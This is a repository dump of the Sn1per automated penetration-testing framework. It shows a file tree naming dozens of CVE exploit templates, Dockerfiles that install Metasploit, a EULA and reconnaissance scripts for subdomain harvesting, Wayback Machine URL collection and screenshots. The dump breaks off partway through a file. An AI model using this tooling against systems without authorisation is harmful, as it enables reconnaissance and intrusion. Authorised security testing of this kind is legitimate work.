├── .github └── workflows │ └── semgrep.yml ├── CHANGELOG.md ├── Dockerfile ├── Dockerfile.blackarch ├── LICENSE.md ├── README.md ├── bin ├── github-subdomains.py ├── http-default-accounts-fingerprints-nndefaccts.lua ├── nmap-bootstrap.xsl ├── pyText2pdf.py ├── report.py ├── samrdump.py ├── slack.sh ├── waybackrobots.py ├── waybackurls.py ├── webscreenshot.js ├── webscreenshot.py └── zap-scan.py ├── conf ├── bug_bounty_full_brute ├── bug_bounty_max_javascript_files ├── bug_bounty_quick ├── bug_bounty_quick_port_80_443_only ├── deep_active_recon ├── default ├── fast_service_portscan ├── super_stealth_mode ├── super_stealth_mode_OSINT ├── web_mode_all_plugins ├── webpwn_only ├── webpwn_only_metasploit_disabled └── zap_only_webscan ├── docker-compose-blackarch.yml ├── docker-compose.yml ├── install.sh ├── loot └── README.md ├── modes ├── airstrike.sh ├── bruteforce.sh ├── discover.sh ├── flyover.sh ├── fullportonly.sh ├── fullportscan.sh ├── javascript-analysis.sh ├── massportscan.sh ├── massvulnscan.sh ├── massweb.sh ├── masswebscan.sh ├── normal.sh ├── normal_webporthttp.sh ├── normal_webporthttps.sh ├── nuke.sh ├── osint.sh ├── osint_stage_2.sh ├── recon.sh ├── sc0pe-active-webscan.sh ├── sc0pe-network-scan.sh ├── sc0pe-passive-webscan.sh ├── sc0pe.sh ├── static-grep-search.sh ├── stealth.sh ├── vulnscan.sh ├── web.sh ├── web_autopwn.sh ├── webporthttp.sh ├── webporthttps.sh └── webscan.sh ├── pro └── notepad.html ├── sn1per.desktop ├── sn1per.png ├── sniper ├── sniper.conf ├── templates ├── active │ ├── AWS_S3_Public_Bucket_Listing.sh │ ├── ApPHP_MicroBlog_Remote_Code_Execution_Vulnerability.sh │ ├── Apache_Solr_Scanner.sh │ ├── Apache_Tomcat_Scanner.sh │ ├── AvantFAX_LOGIN_Detected.sh │ ├── CVE-2018-13379_-_Fortigate_Pulse_Connect_Secure_Directory_Traversal.sh │ ├── CVE-2019-11510_-_Pulse_Connect_Secure_SSL_VPN_Arbitrary_File_Read.sh │ ├── CVE-2019-11580_-_Atlassian_Crowd_Data_Center_Unauthenticated_RCE.sh │ ├── CVE-2019-11581_-_Jira_Template_Injection.sh │ ├── CVE-2019-1653_-_Cisco_RV320_RV326_Configuration_Disclosure.sh │ ├── CVE-2019-16662_-_rConfig_3.9.2_Remote_Code_Execution.sh │ ├── CVE-2019-16759_-_vBulletin_5.x_0-Day_Pre-Auth_Remote_Command_Execution.sh │ ├── CVE-2019-16759_-_vBulletin_5.x_0-Day_Pre-Auth_Remote_Command_Execution_Bypass.sh │ ├── CVE-2019-17558_-_Apache_Solr_RCE.sh │ ├── CVE-2019-19719_Tableau_Server_DOM_XSS.py │ ├── CVE-2019-19781_-_Citrix_ADC_Directory_Traversal.sh │ ├── CVE-2019-19908_-_phpMyChat-Plus_XSS.sh │ ├── CVE-2019-5418_-_Rail_File_Content_Disclosure.sh │ ├── CVE-2019-6340_-_Drupal8_REST_RCE_SA-CORE-2019-003.disabled │ ├── CVE-2019-7192_-_QNAP_Pre-Auth_Root_RCE.sh │ ├── CVE-2019-8442_-_Jira_Webroot_Directory_Traversal_1.sh │ ├── CVE-2019-8442_-_Jira_Webroot_Directory_Traversal_2.sh │ ├── CVE-2019-8451_Jira_SSRF_1.sh │ ├── CVE-2019-8451_Jira_SSRF_2.sh │ ├── CVE-2019-8451_Jira_SSRF_3.sh │ ├── CVE-2019-8451_Jira_SSRF_4.sh │ ├── CVE-2019-8903_-_Totaljs_Unathenticated_Directory_Traversal.sh │ ├── CVE-2019-8982_-_Wavemaker_Studio_6.6_LFI_SSRF.sh │ ├── CVE-2020-0618_-_Remote_Code_Execution_SQL_Server_Reporting_Services.sh │ ├── CVE-2020-10204_-_Sonatype_Nexus_Repository_RCE.sh │ ├── CVE-2020-1147_-_Remote_Code_Execution_in_Microsoft_SharePoint_Server.sh │ ├── CVE-2020-11530_-_Wordpress_Chop_Slider_3_Plugin_SQL_Injection.sh │ ├── CVE-2020-11738_-_WordPress_Duplicator_plugin_Directory_Traversal.sh │ ├── CVE-2020-11738_-_WordPress_Duplicator_plugin_Directory_Traversal_2.sh │ ├── CVE-2020-11738_-_WordPress_Duplicator_plugin_Directory_Traversal_3.sh │ ├── CVE-2020-11738_-_WordPress_Duplicator_plugin_Directory_Traversal_4.sh │ ├── CVE-2020-12271_-_Sophos_XG_Firewall_Pre-Auth_SQL_Injection.sh │ ├── CVE-2020-12720_-_vBulletin_Unauthenticaed_SQLi_1.sh │ ├── CVE-2020-12720_-_vBulletin_Unauthenticaed_SQLi_2.sh │ ├── CVE-2020-12720_-_vBulletin_Unauthenticaed_SQLi_3.sh │ ├── CVE-2020-13167_-_Netsweeper_WebAdmin_Python_Code_Injection_1.sh │ ├── CVE-2020-13167_-_Netsweeper_WebAdmin_Python_Code_Injection_2.sh │ ├── CVE-2020-14181_-_User_Enumeration_Via_Insecure_Jira_Endpoint.sh │ ├── CVE-2020-14815_-_Oracle_Business_Intelligence_Enterprise_DOM_XSS.sh │ ├── CVE-2020-15129_-_Open_Redirect_In_Traefik.sh │ ├── CVE-2020-15920_-_Mida_eFramework_Unauthenticated_RCE.sh │ ├── CVE-2020-17519_-_Apache_Flink_Path_Traversal.sh │ ├── CVE-2020-2034_-_PAN-OS_GlobalProtect_OS_Command_Injection.sh │ ├── CVE-2020-2096_-_Jenkins_Gitlab_Hook_XSS.sh │ ├── CVE-2020-2096_Jenkins_Gitlab_XSS_1.sh │ ├── CVE-2020-2096_Jenkins_Gitlab_XSS_2.sh │ ├── CVE-2020-2096_Jenkins_Gitlab_XSS_3.sh │ ├── CVE-2020-2096_Jenkins_Gitlab_XSS_4.sh │ ├── CVE-2020-2140_-_Jenkin_AuditTrailPlugin_XSS.sh │ ├── CVE-2020-24223_-_Mara_CMS_7.5_Reflective_XSS.sh │ ├── CVE-2020-25213_-_WP_File_Manager_File_Upload.sh │ ├── CVE-2020-2551_-_Unauthenticated_Oracle_WebLogic_Server_Remote_Code_Execution.sh │ ├── CVE-2020-2555_-_WebLogic_Server_Deserialization_RCE.sh │ ├── CVE-2020-3187_-_Citrix_Unauthenticated_File_Deletion.sh │ ├── CVE-2020-3452_-_Cisco_ASA-FTD_Arbitrary_File_Reading_Vulnerability.sh │ ├── CVE-2020-5284_-_Next_JS_Limited_Path_Traversal.sh │ ├── CVE-2020-5405_-_Spring_Directory_Traversal_1.sh │ ├── CVE-2020-5405_-_Spring_Directory_Traversal_2.sh │ ├── CVE-2020-5405_-_Spring_Directory_Traversal_3.sh │ ├── CVE-2020-5412_-_Full-read_SSRF_in_Spring_Cloud_Netflix.sh │ ├── CVE-2020-5902_-_F5_BIG-IP_Remote_Code_Execution_1.sh │ ├── CVE-2020-5902_-_F5_BIG-IP_Remote_Code_Execution_2.sh │ ├── CVE-2020-5902_-_F5_BIG-IP_XSS.sh │ ├── CVE-2020-6287_-_Create_an_Administrative_User_in_SAP_NetWeaver_AS_JAVA.sh │ ├── CVE-2020-7048_-_WP_Database_Reset_3.15_Unauthenticated_Database_Reset.sh │ ├── CVE-2020-7209_-_LinuxKI_Toolset_6.01_Remote_Command_Execution.sh │ ├── CVE-2020-7246_-_qdPM_Authenticated_Remote_Code_Execution.sh │ ├── CVE-2020-7473_Citrix_ShareFile_StorageZones.disabled │ ├── CVE-2020-8115_-_Revive_Adserver_XSS.py │ ├── CVE-2020-8115_-_Revive_Adserver_XSS.sh │ ├── CVE-2020-8163_-_Rails_5.0.1_Remote_Code_Execution.sh │ ├── CVE-2020-8191_-_Citrix_ADC_NetScaler_Gateway_Reflected_XSS.sh │ ├── CVE-2020-8193_-_Citrix_Unauthenticated_LFI.sh │ ├── CVE-2020-8194_-_Citrix_ADC_NetScaler_Gateway_Reflected_Code_Injection.sh │ ├── CVE-2020-8209_-_Citrix_XenMobile_Server_Path_Traversal.sh │ ├── CVE-2020-8209_-_XenMobile-Citrix_Endpoint_Management_Config_Password_Disclosure.sh │ ├── CVE-2020-8209_-_XenMobile-Citrix_Endpoint_Management_Path_Traversal.sh │ ├── CVE-2020-8512_-_IceWarp_WebMail_XSS.sh │ ├── CVE-2020-8772_-_IfiniteWP_Client_1.9.4.5_Authentication_Bypass_1.sh │ ├── CVE-2020-8982_-_Citrix_ShareFile_StorageZones_Unauthenticated_Arbitrary_File_Read.sh │ ├── CVE-2020-9047_-_exacqVision_Web_Service_Remote_Code_Execution.sh │ ├── CVE-2020-9054_-_ZyXEL_NAS_Remote_Code_Execution.sh │ ├── CVE-2020-9484_-_Apache_Tomcat_RCE_by_deserialization.sh │ ├── CVE-2020-9757_-_SEOmatic_3.3.0_Server-Side_Template_Injection.sh │ ├── Cisco_VPN_Login_Scanner.sh │ ├── Cisco_VPN_Scanner.sh │ ├── Citrix-Access-Gateway_Detected.sh │ ├── Citrix_VPN_Scanner.sh │ ├── Citrix_VPN_Scanner_2.sh │ ├── Clear-text_Communications_HTTP.sh │ ├── Clickjacking.sh │ ├── Common_Status_File_Scanner_1.sh │ ├── Common_Status_File_Scanner_2.sh │ ├── Common_Status_File_Scanner_3.sh │ ├── Confluence_Scanner.sh │ ├── Contact_Form_7_Wordpress_Plugin_Found_1.sh │ ├── Contact_Form_7_Wordpress_Plugin_Found_2.sh │ ├── Directory_Listing_Enabled.sh │ ├── Drupal_Install_Found.sh │ ├── Drupal_Scanner_1.sh │ ├── Drupal_Scanner_2.sh │ ├── Drupal_Scanner_3.sh │ ├── Drupal_User_Login.sh │ ├── Drupal_Version_Disclosure.sh │ ├── F5_BIG-IP_Scanner.sh │ ├── F5_BIG-IP_Scanner_2.sh │ ├── Fortigate_Pulse_Connect_Secure_Scanner.sh │ ├── Fortinet_FortiGate_SSL_VPN_Panel_Detected.sh │ ├── Fortinet_FortiGate_SSL_VPN_Panel_Detected_1.sh │ ├── Fortinet_FortiGate_SSL_VPN_Panel_Detected_2.sh │ ├── Fortinet_FortiGate_SSL_VPN_Panel_Detected_3.sh │ ├── Frontpage_Service_Password_Disclosure.sh │ ├── Git_Config_Detected.sh │ ├── JK_Status_Manager.sh │ ├── Jaspersoft_Detected.sh │ ├── Jenkins_Scanner.sh │ ├── Jetty_Version_Disclosure.sh │ ├── Jira_Scanner_1.sh │ ├── Jira_Scanner_2.sh │ ├── Jira_Scanner_3.sh │ ├── Jolokia_Version_Disclosure.sh │ ├── Joomla_Scanner_1.sh │ ├── Joomla_Scanner_2.sh │ ├── Joomla_Version_Disclosure.sh │ ├── Laraval_Environment_File_Found.sh │ ├── MS_SQL_Reporting_Server_Scanner_1.sh │ ├── MS_SQL_Reporting_Server_Scanner_2.sh │ ├── Magento_2.3.0_SQL_Injection.sh │ ├── Mailman_Version_Disclosure.sh │ ├── MobileIron_Login_1.sh │ ├── MobileIron_Login_2.sh │ ├── MobileIron_Login_3.sh │ ├── PHP_Composer_Disclosure.sh │ ├── PHP_Info.sh │ ├── Palo_Alto_GlobalProtect_PAN-OS_Portal_Scanner.sh │ ├── PulseSecure_VPN_Detected.sh │ ├── RabbitMQ_Management_Default_Credentials.sh │ ├── RabbitMQ_Management_Interface_Detected.sh │ ├── Robots.txt_Detected.sh │ ├── SAP_NetWeaver_AS_JAVA_LM_Configuration_Wizard_Detection.sh │ ├── SQLiteManager_Scanner_1.sh │ ├── Sitemap.xml_Detected.sh │ ├── SolarWinds_Orion_Default_Credentials_1.sh │ ├── SolarWinds_Orion_Default_Credentials_2.sh │ ├── SolarWinds_Orion_Panel.sh │ ├── TeamQuest_Login_Found.sh │ ├── Telerik_File_Upload_Web_UI.sh │ ├── Tiki_Wiki_CMS_Groupware_Scanner.sh │ ├── Unauthenticated_Jenkins_Dashboard_Detected.sh │ ├── VMware_vCenter_Unauthenticated_Arbitrary_File_Read.sh │ ├── Weak_Authentication_Scanner.sh │ ├── WebLogic_Scanner.sh │ ├── Web_Config_Detected.sh │ ├── Weblogic_Application_Server_Detected.sh │ ├── Wordpres_Scanner_1.sh │ ├── Wordpres_Scanner_2.sh │ ├── Wordpres_Scanner_3.sh │ ├── Wordpress_WP-File-Manager_Version_Detected.sh │ ├── XSS.py │ ├── cPanel_Login_Found.sh │ ├── cPanel_Login_Found_2.sh │ └── phpMyAdmin_Scanner_1.sh └── passive │ ├── network │ ├── CVE-2018-15473_-_OpenSSH_Username_Enumeration.sh │ ├── Default_Credentials_BruteX.sh │ ├── Default_Credentials_NMap.sh │ ├── Interesting_Domain_Found.sh │ ├── Lack_of_SPF_DNS_Record.sh │ ├── Possible_Takeover_Detected.sh │ ├── SMB_Info_Disclosure.sh │ ├── SMBv1_Enabled.sh │ ├── SSH_Version_Disclosure.sh │ ├── Subjack_Takeover_Detected.sh │ ├── Subover_Takeover_Detected.sh │ └── recursive │ │ ├── Component_With_Known_Vulnerabilities_-_NMap.sh │ │ └── Interesting_Ports_Found.sh │ └── web │ ├── Autocomplete_Enabled.sh │ ├── CORS_Policy_-_Allow-Credentials_Enabled.sh │ ├── CORS_Policy_-_Allow-Origin_Wildcard.sh │ ├── CSP_Not_Enforced.sh │ ├── Clear-text_Communications_HTTP.sh │ ├── Clickjacking.sh │ ├── Drupal_Detected.sh │ ├── Expired_SSL_Certificate.sh │ ├── Fortinet_FortiGate_SSL_VPN_Panel_Passive_Detection.sh │ ├── Insecure_Cookie_-_HTTPOnly_Not_Set.sh │ ├── Insecure_Cookie_-_Secure_Not_Set.sh │ ├── Insecure_SSL_TLS_Connection.sh │ ├── Insecure_SSL_TLS_Connection_CN_Mismatch.sh │ ├── Interesting_Title_Found.sh │ ├── Server_Header_Disclosure.sh │ ├── Strict_Tranposrt_Security_Not_Enforced.sh │ ├── Trace_Method_Enabled.sh │ ├── X-Powered-By_Header_Found.sh │ └── recursive │ ├── Arachni_Vulnerability_Scan.disabled │ ├── Arachni_Vulnerability_Scan_-_HTTP.sh │ ├── Arachni_Vulnerability_Scan_-_HTTPS.sh │ ├── Nikto_Vulnerability_Scan-HTTP.sh │ ├── Nikto_Vulnerability_Scan-HTTPS.sh │ ├── Nuclei_Vulnerability_Scan_-_HTTP.sh │ ├── Nuclei_Vulnerability_Scan_-_HTTPS.sh │ ├── OWASP_Zap_Scan_-_HTTP.sh │ ├── OWASP_Zap_Scan_-_HTTPS.sh │ ├── Wordpress_Vulnerability_Scan_-_HTTPS_1.sh │ ├── Wordpress_Vulnerability_Scan_-_HTTPS_2.sh │ ├── Wordpress_Vulnerability_Scan_-_HTTP_1.sh │ └── Wordpress_Vulnerability_Scan_-_HTTP_2.sh ├── uninstall.sh └── wordlists ├── altdns.txt ├── domains-default.txt ├── domains-quick.txt ├── vhosts.txt ├── web-brute-common.txt ├── web-brute-exploits.txt ├── web-brute-full.txt ├── web-brute-stealth.txt └── web-brute-vulnerabilities.txt /.github/workflows/semgrep.yml: -------------------------------------------------------------------------------- 1 | on: 2 | workflow_dispatch: {} 3 | pull_request: {} 4 | push: 5 | branches: 6 | - main 7 | - master 8 | paths: 9 | - .github/workflows/semgrep.yml 10 | schedule: 11 | # random HH:MM to avoid a load spike on GitHub Actions at 00:00 12 | - cron: 2 23 * * * 13 | name: Semgrep 14 | jobs: 15 | semgrep: 16 | name: semgrep/ci 17 | runs-on: ubuntu-20.04 18 | env: 19 | SEMGREP_APP_TOKEN: ${{ secrets.SEMGREP_APP_TOKEN }} 20 | container: 21 | image: returntocorp/semgrep 22 | steps: 23 | - uses: actions/checkout@v3 24 | - run: semgrep ci 25 | -------------------------------------------------------------------------------- /Dockerfile: -------------------------------------------------------------------------------- 1 | FROM docker.io/kalilinux/kali-rolling:latest 2 | 3 | LABEL org.label-schema.name='Sn1per - Kali Linux' \ 4 | org.label-schema.description='Automated pentest framework for offensive security experts' \ 5 | org.label-schema.usage='https://github.com/1N3/Sn1per' \ 6 | org.label-schema.url='https://github.com/1N3/Sn1per' \ 7 | org.label-schema.vendor='https://sn1persecurity.com' \ 8 | org.label-schema.schema-version='1.0' \ 9 | org.label-schema.docker.cmd.devel='docker run --rm -ti xer0dayz/sniper' \ 10 | MAINTAINER="@xer0dayz" 11 | 12 | RUN echo "deb http://http.kali.org/kali kali-rolling main contrib non-free" > /etc/apt/sources.list && \ 13 | echo "deb-src http://http.kali.org/kali kali-rolling main contrib non-free" >> /etc/apt/sources.list 14 | ENV DEBIAN_FRONTEND noninteractive 15 | 16 | RUN set -x \ 17 | && apt -yqq update \ 18 | && apt -yqq full-upgrade \ 19 | && apt clean 20 | RUN apt install --yes metasploit-framework 21 | 22 | RUN sed -i 's/systemctl status ${PG_SERVICE}/service ${PG_SERVICE} status/g' /usr/bin/msfdb && \ 23 | service postgresql start && \ 24 | msfdb reinit 25 | 26 | WORKDIR /usr/src/app 27 | 28 | RUN apt --yes install git bash 29 | RUN git clone https://github.com/1N3/Sn1per.git \ 30 | && cd Sn1per \ 31 | && ./install.sh \ 32 | && sniper -u force 33 | 34 | CMD ["sniper"] -------------------------------------------------------------------------------- /Dockerfile.blackarch: -------------------------------------------------------------------------------- 1 | FROM docker.io/blackarchlinux/blackarch:latest 2 | 3 | # Upgrade system 4 | RUN pacman -Syu --noconfirm 5 | 6 | # Install sn1per from official repository 7 | RUN pacman -Sy sn1per --noconfirm 8 | 9 | CMD ["sn1per"] -------------------------------------------------------------------------------- /LICENSE.md: -------------------------------------------------------------------------------- 1 | ## LICENSE: 2 | Sn1per Community Edition End User License Agreement (EULA) 3 | 4 | Sn1perSecurity LLC grants you the right to download, use, and distribute in part or in whole Sn1per Community Edition (also referred to as “Project”, “Code”, “Software”, “Sn1per”, “Product”), provided the following terms and conditions are met: 5 | 6 | (1) You agree to give credit to the original author @xer0dayz and link back to https://sn1persecurity.com (Sn1perSecurity LLC) 7 | (2) You may not rename or rebrand the Project. 8 | (3) You agree not to create any product or service from any par of the Code from this Project, paid or free. 9 | (4) You agree not to re-license the Code. 10 | (5) You may not use the Code for illegal or nefarious purposes, which violates any laws (in your jurisdiction, the jurisdiction in which the Software is running, the jurisdiction in which the Software is targeting, and the United States of America). 11 | (6) You agree not to scan a target in a manner that is considered unlawful, illegal, or that you do not have explicit permission to do so. 12 | 13 | This Software is provided as-is without warranty. Sn1perSecurity LLC, its creators and staff take no liability for consequential damages to the maximum extent permitted by all applicable laws. In no event shall Sn1perSecurity LLC or any person be liable for any consequential, reliance, incidental, special, direct or indirect damages whatsoever (including without limitation, damages for loss of business profits, business interruption, loss of business information, personal injury, or any other loss) arising out of or in connection with the use or inability to use this Product, even if Sn1perSecurity LLC has been advised of the possibility of such damages. 14 | 15 | Sn1perSecurity LLC does not guarantee any functionality or performance of Sn1per Community Edition. Sn1perSecurity LLC does not warrant that the Code will be maintained and in good working order, or that the Software will meet your requirements, be uninterrupted, or error free, or that any errors in the Software will be corrected. 16 | 17 | The Software code, name, and logos are owned by Sn1perSecurity LLC and protected by the United States of America and the state of Arizona copyright and/or patent laws of international treaty provisions. All rights reserved. 18 | 19 | Sn1perSecurity LLC reserves the right to change the licensing terms at any time, without advance notice. Sn1perSecurity LLC reserves the right to terminate your license at any time. 20 | 21 | If any provision of this EULA is determined to be unlawful, void, or unenforceable, such provision shall nonetheless be enforceable to the fullest extent permitted by applicable law, and the unenforceable portion shall be deemed to be severed from this EULA. Such determination shall not affect the validity and enforceability of any remaining provisions. 22 | 23 | Failure of Sn1perSecurity LLC to exercise or enforce any right or provision of this EULA does not constitute a waiver of such right or provision. 24 | 25 | Any ambiguities in the interpretation of this EULA shall not be construed against the drafting party/parties. 26 | 27 | Download, use, distribution (in part or in whole) of this Project/Code constitutes your acceptance of the Sn1per Community Edition EULA. If at any time you are not in agreement or cannot meet any part of this EULA, you should immediately cease use of the Project by removing/uninstalling all copies from all locations. 28 | 29 | For any questions concerning this EULA, please submit a GitHub issue with your question: https://github.com/1N3/Sn1per 30 | 31 | -------------------------------------------------------------------------------- /bin/github-subdomains.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3.5 2 | 3 | # I don't believe in license. 4 | # You can do whatever you want with this program. 5 | 6 | import os 7 | import sys 8 | import re 9 | import time 10 | import requests 11 | import random 12 | import argparse 13 | from functools import partial 14 | from colored import fg, bg, attr 15 | from multiprocessing.dummy import Pool 16 | 17 | 18 | TOKENS_FILE = os.path.dirname(os.path.realpath(__file__))+'/.tokens' 19 | 20 | 21 | def githubApiSearchCode( search, page ): 22 | headers = {"Authorization":"token "+random.choice(t_tokens)} 23 | url = 'https://api.github.com/search/code?s=indexed&type=Code&o=desc&q=' + search + '&page=' + str(page) 24 | # print(url) 25 | 26 | try: 27 | r = requests.get( url, headers=headers, timeout=5 ) 28 | json = r.json() 29 | return json 30 | except Exception as e: 31 | print( "%s[-] error occurred: %s%s" % (fg('red'),e,attr(0)) ) 32 | return False 33 | 34 | 35 | def getRawUrl( result ): 36 | raw_url = result['html_url']; 37 | raw_url = raw_url.replace( 'https://github.com/', 'https://raw.githubusercontent.com/' ) 38 | raw_url = raw_url.replace( '/blob/', '/' ) 39 | return raw_url; 40 | 41 | 42 | def readCode( regexp, source, result ): 43 | url = getRawUrl( result ) 44 | code = doGetCode( url ) 45 | # print(code) 46 | 47 | if code: 48 | matches = re.findall( regexp, code ) 49 | if matches: 50 | for sub in matches: 51 | # print(sub) 52 | sub = sub[0].replace('2F','').lower().strip() 53 | if len(sub) and not sub in t_history: 54 | t_history.append( sub ) 55 | sys.stdout.write( "%s" % sub ) 56 | if source: 57 | sys.stdout.write( "\t-> %s" % result['html_url'] ) 58 | sys.stdout.write( "\n" ) 59 | 60 | 61 | def doGetCode( url ): 62 | # print( url ) 63 | try: 64 | r = requests.get( url, timeout=5 ) 65 | except Exception as e: 66 | sys.stdout.write( "%s[-] error occurred: %s%s\n" % (fg('red'),e,attr(0)) ) 67 | return False 68 | 69 | return r.text 70 | 71 | 72 | parser = argparse.ArgumentParser() 73 | parser.add_argument( "-t","--token",help="auth token (required)" ) 74 | parser.add_argument( "-d","--domain",help="domain you are looking for (required)" ) 75 | parser.add_argument( "-e","--extend",help="also look for example.com", action="store_true" ) 76 | parser.add_argument( "-s","--source",help="display first url where subdomains are found", action="store_true" ) 77 | parser.parse_args() 78 | args = parser.parse_args() 79 | 80 | t_tokens = [] 81 | if args.token: 82 | t_tokens = args.token.split(',') 83 | else: 84 | if os.path.isfile(TOKENS_FILE): 85 | fp = open(TOKENS_FILE,'r') 86 | t_tokens = fp.read().split("\n") 87 | fp.close() 88 | 89 | if not len(t_tokens): 90 | parser.error( 'auth token is missing' ) 91 | 92 | if args.source: 93 | _source = True 94 | else: 95 | _source = False 96 | 97 | if args.domain: 98 | _domain = args.domain 99 | else: 100 | parser.error( 'domain is missing' ) 101 | 102 | t_history = [] 103 | page = 1 104 | _search = '"' + _domain + '"' 105 | 106 | ### this is a test, looks like we got more result that way 107 | import tldextract 108 | t_host_parse = tldextract.extract( _domain ) 109 | _search = '"' + t_host_parse.domain + '"' 110 | # print( t_host_parse ) 111 | # exit() 112 | ### 113 | 114 | # egrep -io "[0-9a-z_\-\.]+\.([0-9a-z_\-]+)?`echo $h|awk -F '.' '{print $(NF-1)}'`([0-9a-z_\-\.]+)?\.[a-z]{1,5}" 115 | 116 | 117 | if args.extend: 118 | # _regexp = r'[0-9a-zA-Z_\-\.]+' + _domain.replace('.','\.') 119 | _regexp = r'([0-9a-z_\-\.]+\.([0-9a-z_\-]+)?'+t_host_parse.domain+'([0-9a-z_\-\.]+)?\.[a-z]{1,5})' 120 | else: 121 | _regexp = r'(([0-9a-zA-Z_\-\.]+)\.' + _domain.replace('.','\.')+')' 122 | # print(_regexp) 123 | 124 | # for page in range(1,10): 125 | while True: 126 | time.sleep( 1 ) 127 | t_json = githubApiSearchCode( _search, page ) 128 | # print(t_json) 129 | page = page + 1 130 | 131 | if not t_json or 'documentation_url' in t_json or not 'items' in t_json or not len(t_json['items']): 132 | break 133 | 134 | pool = Pool( 30 ) 135 | pool.map( partial(readCode,_regexp,_source), t_json['items'] ) 136 | pool.close() 137 | pool.join() 138 | -------------------------------------------------------------------------------- /bin/report.py: -------------------------------------------------------------------------------- 1 | import pdfkit 2 | pdfkit.from_url('/usr/share/sniper/loot/workspace/hulu/sniper-report.html', 'out.pdf') 3 | -------------------------------------------------------------------------------- /bin/slack.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # Slack API Integration script for Sn1per 3 | # By @xer0dayz - https://sn1persecurity.com 4 | # 5 | 6 | source /usr/share/sniper/sniper.conf 2> /dev/null 7 | source /root/.sniper.conf 2> /dev/null 8 | source /root/.sniper_api_keys.conf 2> /dev/null 9 | 10 | MESSAGE="$1" 11 | 12 | if [ "$MESSAGE" == "postfile" ]; then 13 | FILENAME="$2" 14 | curl -F "file=@$FILENAME" -F "initial_comment=$FILENAME" -F "channels=$SLACK_CHANNEL" -H "Authorization: Bearer $SLACK_API_TOKEN" https://slack.com/api/files.upload 2> /dev/null > /dev/null 15 | else 16 | curl -X POST -H 'Content-type: application/json' --data "{\"text\":\"$MESSAGE\"}" $SLACK_WEBHOOK_URL 2> /dev/null > /dev/null 17 | fi 18 | -------------------------------------------------------------------------------- /bin/waybackrobots.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | import sys 4 | from multiprocessing.dummy import Pool 5 | 6 | 7 | def robots(host): 8 | r = requests.get( 9 | 'https://web.archive.org/cdx/search/cdx\ 10 | ?url=%s/robots.txt&output=json&fl=timestamp,original&filter=statuscode:200&collapse=digest' % host) 11 | results = r.json() 12 | if len(results) == 0: # might find nothing 13 | return [] 14 | results.pop(0) # The first item is ['timestamp', 'original'] 15 | return results 16 | 17 | 18 | def getpaths(snapshot): 19 | url = 'https://web.archive.org/web/{0}/{1}'.format(snapshot[0], snapshot[1]) 20 | robotstext = requests.get(url).text 21 | if 'Disallow:' in robotstext: # verify it's acually a robots.txt file, not 404 page 22 | paths = re.findall('/.*', robotstext) 23 | return paths 24 | return [] 25 | 26 | 27 | if __name__ == '__main__': 28 | if len(sys.argv) < 2: 29 | print('Usage:\n\tpython3 waybackrobots.py ') 30 | sys.exit() 31 | 32 | host = sys.argv[1] 33 | 34 | snapshots = robots(host) 35 | print('Found %s unique results' % len(snapshots)) 36 | if len(snapshots) == 0: 37 | sys.exit() 38 | print('This may take some time...') 39 | pool = Pool(4) 40 | paths = pool.map(getpaths, snapshots) 41 | unique_paths = set() 42 | for i in paths: 43 | unique_paths.update(i) 44 | filename = '%s-robots.txt' % host 45 | with open(filename, 'w') as f: 46 | f.write('\n'.join(unique_paths)) 47 | print('[*] Saved results to %s' % filename) 48 | -------------------------------------------------------------------------------- /bin/waybackurls.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import sys 3 | import json 4 | 5 | 6 | def waybackurls(host, with_subs): 7 | if with_subs: 8 | url = 'http://web.archive.org/cdx/search/cdx?url=*.%s/*&output=json&fl=original&collapse=urlkey' % host 9 | else: 10 | url = 'http://web.archive.org/cdx/search/cdx?url=%s/*&output=json&fl=original&collapse=urlkey' % host 11 | r = requests.get(url) 12 | results = r.json() 13 | return results[1:] 14 | 15 | 16 | if __name__ == '__main__': 17 | argc = len(sys.argv) 18 | if argc < 2: 19 | print('Usage:\n\tpython3 waybackurls.py ') 20 | sys.exit() 21 | 22 | host = sys.argv[1] 23 | with_subs = False 24 | if argc > 3: 25 | with_subs = True 26 | 27 | urls = waybackurls(host, with_subs) 28 | json_urls = json.dumps(urls) 29 | if urls: 30 | filename = '%s-waybackurls.json' % host 31 | with open(filename, 'w') as f: 32 | f.write(json_urls) 33 | print('[*] Saved results to %s' % filename) 34 | else: 35 | print('[-] Found nothing') 36 | -------------------------------------------------------------------------------- /bin/webscreenshot.js: -------------------------------------------------------------------------------- 1 | /*** 2 | # This file is part of webscreenshot. 3 | # 4 | # Copyright (C) 2014, Thomas Debize 5 | # All rights reserved. 6 | # 7 | # webscreenshot is free software: you can redistribute it and/or modify 8 | # it under the terms of the GNU Lesser General Public License as published by 9 | # the Free Software Foundation, either version 3 of the License, or 10 | # (at your option) any later version. 11 | # 12 | # webscreenshot is distributed in the hope that it will be useful, 13 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 14 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 15 | # GNU Lesser General Public License for more details. 16 | # 17 | # You should have received a copy of the GNU Lesser General Public License 18 | # along with webscreenshot. If not, see . 19 | ***/ 20 | 21 | var Page = (function(custom_headers, http_username, http_password) { 22 | var opts = { 23 | width: 1200, 24 | height: 800, 25 | ajaxTimeout: 400, 26 | maxTimeout: 800, 27 | httpAuthErrorCode: 2 28 | }; 29 | 30 | var requestCount = 0; 31 | var forceRenderTimeout; 32 | var ajaxRenderTimeout; 33 | 34 | var page = require('webpage').create(); 35 | page.viewportSize = { 36 | width: opts.width, 37 | height: opts.height 38 | }; 39 | 40 | page.settings.userAgent = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36'; 41 | page.settings.userName = http_username; 42 | page.settings.password = http_password; 43 | 44 | page.customHeaders = custom_headers; 45 | 46 | page.onInitialized = function() { 47 | page.customHeaders = {}; 48 | }; 49 | // Silence confirmation messages and errors 50 | page.onConfirm = page.onPrompt = page.onError = noop; 51 | 52 | page.onResourceRequested = function(request) { 53 | requestCount += 1; 54 | clearTimeout(ajaxRenderTimeout); 55 | }; 56 | 57 | page.onResourceReceived = function(response) { 58 | if (response.stage && response.stage == 'end' && response.status == '401') { 59 | page.failReason = '401'; 60 | } 61 | 62 | if (!response.stage || response.stage === 'end') { 63 | requestCount -= 1; 64 | if (requestCount === 0) { 65 | ajaxRenderTimeout = setTimeout(renderAndExit, opts.ajaxTimeout); 66 | } 67 